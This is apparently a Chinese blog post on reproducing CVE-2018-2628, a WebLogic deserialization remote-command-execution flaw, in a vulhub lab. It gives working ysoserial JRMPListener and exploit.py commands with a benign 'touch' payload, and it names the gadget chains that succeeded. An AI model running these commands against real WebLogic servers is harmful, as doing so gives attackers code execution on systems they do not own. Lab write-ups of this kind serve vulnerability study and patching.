【vulhub】Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

简单来说就是先用序列化工具ysoserial启动一个JRMP服务,加载先相关漏洞利用链,加载你要执行的恶意代码。

并将上述结果通过序列化工具ysoserial将我们的恶意代码进行一个序列化操作。

第二步就是将我们的exp去加载ysoserial序列化后的数据,后去打有漏洞的服务。

这个有反序列化漏洞的服务,会去反序列化后,执行我们的恶意代码。

关于cve-2018-2628 楼主测试到这4条cc链都可以打成功cc1 cc6 cc7 cc9

第一步,起一个JRMP服务

bash 复制代码
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/akemi'

第二步,漏洞的相关exp去加载JRMP相关的一个序列化恶意代码

bash 复制代码
python exploit.py 192.168.100.34 7001 ysoserial.jar 192.168.100.34 1099 JRMPClient

参考链接

Vulnhub-Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
weblogic-JAVA反序列化(CVE-2018-2628)
Weblogic CVE-2020-2551漏洞复现&CS实战利用
从0学习WebLogic CVE-2020-2551漏洞
CVE-2018-2628漏洞复现(基于vulhub非常详细!)
runtime函数问题编码
vulhub镜像问题拉取问题

基于ysoserial的深度利用研究(命令回显与内存马)

Beacon Tower Lab记一次反序列化漏洞的利用之路

相关推荐
今天_也很困7 分钟前
LeetCode热题100-560. 和为 K 的子数组
java·算法·leetcode
在繁华处20 分钟前
线程进阶: 无人机自动防空平台开发教程V2
java·无人机
A懿轩A25 分钟前
【Java 基础编程】Java 变量与八大基本数据类型详解:从声明到类型转换,零基础也能看懂
java·开发语言·python
m0_7400437327 分钟前
【无标题】
java·spring boot·spring·spring cloud·微服务
@ chen1 小时前
Spring事务 核心知识
java·后端·spring
aithinker1 小时前
使用QQ邮箱收发邮件遇到的坑 有些WIFI不支持ipv6
java
星火开发设计1 小时前
C++ 预处理指令:#include、#define 与条件编译
java·开发语言·c++·学习·算法·知识
Hx_Ma162 小时前
SpringMVC返回值
java·开发语言·servlet
Yana.nice2 小时前
openssl将证书从p7b转换为crt格式
java·linux
独自破碎E2 小时前
【滑动窗口+字符计数数组】LCR_014_字符串的排列
android·java·开发语言